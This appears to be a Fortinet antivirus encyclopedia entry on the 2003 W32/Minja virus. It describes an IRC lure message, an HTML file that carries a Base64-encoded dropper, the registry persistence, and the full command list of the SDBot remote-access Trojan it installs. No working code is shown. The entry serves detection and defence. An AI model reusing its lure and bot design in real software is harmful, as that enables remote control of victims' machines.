W32/Minja

description-logoAnalysis

  • Detection included in Fortinet Virus Update July 2 2003
    Firmware 2.30 AV definition 4.100
    Firmware 2.36 AV definition 4.100
    Firmware 2.50 AV definition 4.100
  • Virus is 32bit with a compressed application size of 23,110 bytes – the virus may be encoded within an HTML document packaged within a .ZIP file named “Mindjail.zip” – the .ZIP contains these comments –
    Im lame, but im not a kiddie heh
    =]
  • The virus may have been posted as a link in IRC channels or sent as a message to IRC users in this format –
    <undefinedundefinedundefinedundefinedundefinedundefinedundefinedundefinedundefined> EEEEEEETHHHOOOM! MINDJAIL!! HE IS TRAPPED!! GET HIM OUT! http://XX.XX.XX.XX:3030/mindjail.zip
    In the above message, “undefinedundefinedundefinedundefinedundefinedundefinedundefinedundefinedundefined” represents a string of nine random letters – the hyperlink pointed to an infected computer
  • If the .ZIP file is downloaded, it may contain an HTML encoded file named “mindjail.html” with a file size of 32,907 bytes – the HTML file contains a Base64 encoded binary which is decoded and initiated by script within the HTML file – the file may be initiated without user interaction
  • If mindjail.html is opened, the binary may be written to the local machine as “javax.sun.base.exe” – in the bottom of the Internet Explorer browser pane, the message “Installing components…java.sun.base.exe” may be visible – text is also displayed in the browser window with reference to “Mindjail” as in this excerpt from that display –
    MINDJAIL
    Eworethom is trapped - in mindjail.... Mindjail is a trap - its a thought that you just cant get out of your head..E-thoms Mindjail is that he cannot escape a mysterious invisible box which he calls "Satans Box".
  • When the file “java.sun.base.exe” is run, it may copy itself as the file “HPSCHED.EXE” into the Windows\System folder and modify the registry to load at Windows startup
  • The written file is a variant of the remote access Trojan known as “SDBot”
  • The Trojan connects with an IRC channel and awaits commands from a hacker or group of hackers – the Trojan can accept the following commands –
    Action - Shortcut
    about - "ab"
    action - "a"
    addalias - "aa"
    aliases - "al"
    c_action - "c_a"
    c_join - "c_j"
    c_mode - "c_m"
    c_nick - "c_n"
    c_part - "c_p"
    c_privmsg - "c_pm"
    c_quit - "c_q"
    c_raw - "c_r"
    c_rndnick - "c_rn"
    clone - "c"
    cycle - "cy"
    delay - "de"
    die - "d"
    disconnect - "dc"
    dns - "dn"
    download - "dl"
    execute - "e"
    id - "i"
    join - "j"
    killthread - "k"
    log - "lg"
    logout - "lo"
    mode - "m"
    netinfo - "ni"
    nick - "n"
    nldump - "nld"
    open - "o"
    part - "pt"
    ping - "p"
    prefix - "pr"
    privmsg - "pm"
    quit - "q"
    raw - "rw"
    reconnect - "r"
    redirect - "rd"
    remove - "rm"
    repeat - "rp"
    rndnick - "rn"
    server - "se"
    spam - "spm"
    spy - "sp"
    status - "s"
    syn - "syn1"
    sysinfo - "si"
    threads - "t"
    udp - "u"
    update - "up"
    visit - "v"
    worm - "worm"

Telemetry logoTelemetry